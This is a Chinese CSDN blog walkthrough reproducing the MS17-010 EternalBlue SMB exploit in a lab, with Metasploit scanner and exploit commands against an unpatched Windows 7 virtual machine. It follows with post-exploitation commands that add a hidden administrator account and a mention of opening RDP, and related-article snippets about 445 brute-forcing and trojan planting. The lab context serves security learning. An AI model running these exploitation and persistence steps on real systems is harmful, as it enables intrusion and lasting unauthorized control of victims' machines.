漏洞利用445端口___MS17-010永恒之蓝复现

最新推荐文章于 2024-04-29 23:02:27 发布
最新推荐文章于 2024-04-29 23:02:27 发布
阅读量2.6k 收藏 6
点赞数 1
文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43071873/article/details/109198979
版权

靶机 192.168.118.133 (关闭防火墙,没打补丁)
攻击机 kali 192.168.118.147

1.扫描主机,发现目标主机445端口打开着

在这里插入图片描述

2.利用msfconsole攻击
在这里插入图片描述

搜索ms17-010 查看漏洞模块 可以看到辅助模块auxiliary,攻击模块exploit
在这里插入图片描述

使用辅助模块 use auxiliary/scanner/smb/smb_ms17_010
查看配置,看下需要配置啥 show options
在这里插入图片描述

这里就看到了rhosts没配置,也就是目标靶机
设置一下:set rhost 192.168.118.133
设置完run一下,系统为windows 7 旗舰版 64位 存在ms17-010

在这里插入图片描述

使用攻击模块 use exploit/windows/smb/ms17_010_eternalblue
查看配置,show options
在这里插入图片描述

需要配置lhost set lhost 192.168.118.147(攻击机)
Run一下开始攻击
在这里插入图片描述

查看目标主机系统信息
在这里插入图片描述

Shell,连接后门,拿到控制台shell
创建用户Lin 密码123456。Net user Lin 123456 /add
添加到本地管理员组 net localgroup administrators Lin /add
在这里插入图片描述

查看win7管理员 net localgroup administrators
查看到新加的Lin
在这里插入图片描述

之后呢,可以开启目标主机的3389端口,远程连接桌面后面就不再演示。拿到了最高权限,那基本你能想到的都能做到。

Lin冲啊
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
生成REF_CODE的代码
weixin_44383954的博客
12-07 13万+
在内容期间,把开发过程中常用的一些内容记录起来,下面内容是关于生成REF_CODE的内容,希望对小伙伴有较大用途。 public static void refCode() { List t = new ArrayList(); t.add(“Dummy”); t.add(“Enrich”); t.add(“GST Waiver”); t.add(“Annual Fee Waiver”); t.add("DB Cash Back Waiver "); t.add(“General”); t.add(“Fas
445端口攻击
m0_61948493的博客
11-23 1万+
一、简单的渗透攻击 1、端口 首先要先了解了解一下一些基本的端口所对应的服务: 1)FTP:文件共享服务 2)SSH:专为远程登陆会话和其他网络服务提供安全性的协议,有效防止远程管理过程中的信息泄露问题(比telnet安全) 3)telnet: Internet远程登录服务的标准协议和主要方式 4)SMTP: 建立在FTP文件传输服务上的一种邮件服务 5)DNS : 域名解析服务 6)HTTP 、HTTPS:超文本传输协议(建立在TCP,HTTPS比HTTP更安全) 7)共享...
code-server 4.1.0 压缩包
03-22
code-server 4.1.0 压缩包
MS17-010---利用“永恒之蓝”漏洞攻击 win7主机
最新发布
金灰的博客
04-29 1166
SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口
cmu14-445 环境搭建
passenger12234的博客
03-03 8360
0. 序 记录自己在克隆bustub时的踩坑经历。 1. gtest无法正常运行 虽然bustub的仓库中建立一个私人仓库,然后给出了详细的命令行步骤,但我这个懒人不太想专门去建个仓库,于是就顺手直接把仓库克隆了下来。 git clone https://github.com/cmu-db/bustub 然后build里面的dockerfile搭建镜像,然后尝试在docker里面运行。结果运行构建好的测试,什么输出都没有。。。大概类似于下面这样 $./test/lru_replacer_test #没有任
jsp代码实例第351课
虾米大王的学习历程
02-25 7649
code351.jsp <%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>Insert title here</title> </head> <body&
漏洞利用三:445端口漏洞利用
热门推荐
ZY95001的博客
09-04 1万+
445端口用来访问共享文件夹,445端口之所以危险,是因为厂商默认开放。 靶机:win7系统 IP:10.0.0.199 提前关闭靶机防火墙 一、MS17-010 永恒之蓝 MS微软,17年,10号漏洞。即新闻上报道的比特币勒索病毒。 1.进入MSF控制台:msfconsole 2.找到要利用漏洞输入编号(search命令):search ms17-010 3.查看组件列表,选择要利用的攻击项(use命令):use 0 4.以为此处提示需...
2008-MS08-067.rar_ MS08067_Amazon_MS08067_MSB-MS08-067_溢出
09-14
ms08067漏洞远程溢出代码,已测试可用,最新版,在远程电脑上开4444端口,只是感觉shellcode略差,如能反连可避过防火墙,看看哪位牛人愿意修改一下
网络安全-实验三ms17-010漏洞利用.docx
11-10
MS17-010漏洞,也称为“永恒之蓝”(EternalBlue),是针对Microsoft Windows操作系统的一个严重漏洞,主要影响Windows XP、Windows 7以及Server 2003和2008等未打补丁的系统。该漏洞利用的是SMB(Server Message ...
永恒之蓝 屏蔽135-139、445、3389端口脚本
10-15
针对永恒之蓝漏洞,自动导入IP安全策略的脚本屏蔽135-139、445、3389端口,对脚本进行优化,解决了以管理员权限运行脚本时,默认路径是"C:\Windows\system32>" 导致命令找不到策略文件,导入策略失败的问题。...
MS17-010:MS17-010的自动入侵
04-23
至于"MS17-010-main"这个压缩包文件,它可能包含了利用MS17-010漏洞的相关工具、脚本或者说明文档。解压并仔细研究这些内容,可以帮助我们更好地理解攻击者的手段,也可以为防御策略提供有价值的信息。但是,必须...
Cryptix_src_3-0-3.rar_Cryptix_src_3-0-3_网络连接_网络连接端口_隐藏 端口
09-19
标签"cryptix_src_3-0-3"再次强调了这是Cryptix的源代码,"网络连接"和"网络连接端口"是该程序关注的重点,"隐藏端口"则暗示了这个工具具有检测非公开或潜在不安全的网络端口的能力。 压缩包内的文件名列表揭示了更...
不明真相的http code 497
关注系统性能调优
11-06 7551
刚开发找到我,反馈现场大量流程无法发送,说是锁的问题。 我问:发送之后是一直在等待,还是马上会返回错误。 得到答复:会马上报错。 原本这种错误看下后台日志,不过节点过多,无法定位到是哪个节点,最快的方式是用chrome看看返回,捕获的请求headers如下: Request URL: http://11.15.22.1/web/gg/project/common/ggpmsOperateActio...
Vue中的ref指令 &常用内置指令大全
程序员小火车---嘟嘟嘟,开火车啦
08-23 8806
欢迎大家加入我的github项目,一起学习,一起发展 ---> 全栈工程师进阶学习站 ---> 我的前端学习笔记 --->行业内最新最群的报告,工作日每日更新 —>原生 js 训练计划 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> &l...
网络安全:通过445端口暴力破解植入木马。
srhqwe的博客
04-30 2712
本地的cmd上并不能让程序在对方电脑上执行,如果使用\\10.1.1.2\C$\system.exe。同时at是可以定时,因为可能地区上的差异,可以用net time \\10.1.1.2看对方主机的时间。$之前代表的是共享什么文件夹,ipc是通用的,也可以是C$共享C盘,D$共享D盘。需要注意,这里时间最后写对方主机时间后3分钟开外,否则有可能让系统认为是明天。在cmd输入net use \\x.x.x.x\ipc$程序放入对方磁盘后,就需要在对方电脑上执行了。如上图可以让对方主机执行这条命令。
python爬虫520状态码
qq_43599076的博客
09-17 2510
我爬一个表情包网站的表情,数量也不多,但是出现了520状态码,这个东西是啥意思啊??
永恒之蓝ms17_010漏洞复现
m0_73005107的博客
11-28 1419
永恒之蓝漏洞复现
msfconsole——smb_version扫描可攻击的445端口
Ho1aAs‘s Blog
07-28 3129
文章目录一、使用环境二、smb_version完 免责声明:本文章仅供学习、交流使用 一、使用环境 VMware V15.5.0 Kali-Linux-2020.2 msfconsole 二、smb_version 若只针对445端口以及使用ms17010 EternalBlue永恒之蓝 渗透,可以使用此工具快速扫描 在msfconsole下键入search smb_version并use加载 配置RHOST(对象)快速扫描 192.168.x.1/24扫描整个子网 完 欢迎在评论区留言 感谢
渗透测试(445端口
qq_45433707的博客
05-23 2289
笔记 由于太困,文章涉及的软件想要私聊(其实网上都有,想找都能找到) 1.授权 2.信息收集(nslookup whois) 3.扫描漏洞 ​ namp扫描IP 范围 端口 80 {IIS,apache,什么网站,软件 漏洞})scanpot软件扫描; ​ 高级扫描:如IIS漏洞 2003-iis6.0 2008iis7.0 ​ 扫描网站漏洞(十大网站漏洞 ) 4.漏洞利用 5.提权(shell环境命令控制权,桌面环境,最高权限) =======删库跑路 6.毁尸灭迹(删除日志) 7.留后门 8.
ms17-010漏洞复现
10-22
1. 使用nmap进行探测,发现开启445端口,该端口可能会存在MS17-010漏洞。 2. 使用MSF的永恒之蓝漏洞模块。 3. 使用ms17-010扫描模块,对靶机进行扫描。 4. 使用ms17-010攻击模块,对靶机进行攻击。 5. 得到靶机shell...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值